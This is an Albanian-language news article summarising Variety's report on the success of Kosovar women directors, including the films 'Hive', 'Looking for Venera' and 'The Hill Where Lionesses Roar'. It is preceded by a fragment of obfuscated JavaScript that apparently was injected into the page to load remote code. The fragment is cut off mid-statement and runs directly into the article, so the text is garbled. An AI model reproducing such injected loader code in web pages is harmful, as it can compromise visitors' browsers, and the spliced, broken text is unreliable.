;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Variety” shkruan për sukseset e grave kosovare në industrinë e filmit

By

Mediumi prestigjioz, Variety, i ka kushtuar një artikull industrisë së filmit të Kosovës, që sipas tyre, çdo ditë e më shumë po pasurohet nga sukseset e grave.

Sipas këtij mediumi, ngritja e industrisë së filmit kosovar është një nga historitë më të pamundura të suksesit në kinemanë botërore sot, duke pasur parasysh sfondin e një lufte shkatërruese, pasojat e së cilës ndihen edhe në këtë kohë.

“Në çdo rrethanë do të konsiderohej një vit i jashtëzakonshëm për një vend prej dy milionë banorëve, që hapi shkollën e tij të parë të filmit 20 vjet më parë”, ka shkruar ky medium.

“Ajo luftë ka lejuar një brez të ri të grave që të gjejnë zërin e tyre përmes filmit dhe të sjellin përvojat e tyre në ekran”.

“Filmi “Hive” bazohet në historinë e vërtetë të një vejushe e cila lufton kundër qëndrimeve kokëfortë patriarkale të fshatit të saj në kërkimin e saj për pavarësi. Në “Në kërkim të Venerës”, një grua e re që lufton me seksualitetin e saj të ri, përpiqet të gjejë veten në një qytet të vogël ku një vajzë pritet mbi të gjitha për të mbrojtur emrin e familjes. Dhe “Kodra ku ulërijnë luaneshat” tregon historinë e tre grave të reja me shpirt të lirë që përpiqen të imagjinojnë një të ardhme përtej traditave mbytëse të atdheut të tyre”.

Regjisorja kosovare, Kaltrina Krasniqi, në intervistën e dhënë për këtë medium, ka shpjeguar se gratë në kinemanë kosovare kishin kohë që kishin rënë në role dytësore. Megjithatë, pas luftës, regjisoret femra filluan të rishkruajnë skenarin.

“Shoqëria jonë ka kaluar nëpër disa ndryshime dramatike në një kohë shumë të shkurtër. Unë nuk mund ta imagjinoj një jetë ku do të më duhej të negocioja lirinë time në çdo hap. Për mua të ndihem ashtu siç ndihem, të jem aq e lirë dhe e pavarur sa jam, kjo është lufta që bëri nëna ime”, ka thënë Krasniqi, në intervistën e dhënë për Variety.

Sipas Variety, Kosova mbulon një vit të suksesshëm për industrinë fillestare të filmit kosovar, i cili filloi me debutimin e Blerta Bashollit, “Hive”, duke fituar tre çmime, përfshirë çmimin e madh të jurisë, në Festivalin e Filmit “Sundance”.

Një tjetër regjisore, Norika Sefa, sipas Variety, për herë të parë e ndoqi atë triumf, duke marrë një çmim special të jurisë në Roterdam për filmin “Në kërkim të Venerës”. E në Kanë, aktorja franceze-kosovare e kthyer në regjisore, Luàna Bajrami, e njohur për rolin e saj të suksesshëm në “Portreti i një Zonje në Zjarr” të Celine Sciamma, lakoi debutimin e saj regjisorial, me filmin “Kodra ku ulërijnë luaneshat”.

“Vera, ëndrrat e detit” përqendrohet në një grua të moshës së mesme, ku vetëvrasja e papritur e burrit të saj, lë pronësinë e shtëpisë në pikëpyetje. Andaj gruaja, e luajtur nga Teuta Jegeni Ajdini, detyrohet të përballet me paragjykimet gjinore dhe pabarazitë e një sistemi ligjor që vazhdon të privilegjojë burrat.

“I shkruar nga Doruntina Basha, është një film që u frymëzua pjesërisht nga nëna e Krasniqit, e cila u divorcua nga burri i saj në vitet e ’80-ta dhe kaloi katër vjet duke luftuar një betejë gjyqësore për të mbajtur pronën që ishte e drejta e saj. Në fund, ajo u detyrua të braktisë betejën, kur doli shumë e kushtueshme për të që të vazhdonte. Për Krasniqin, historia është emblematike se si gratë e brezit të nënës së saj duhej të negocionin lirinë e tyre në baza të përditshme”, shpjegon Variety.

Variety nuk la pa përmendur edhe situatën aktuale në Kosovë, ku thuhet se kosovarët kanë arritur përparime të qëndrueshme në vend që nga ajo kohë, përfshirë këtu edhe nivelet më të larta të qeverisë, ku presidenti dhe gati 40 përqind e Parlamentit janë gra.

Artikuj të ngjashëm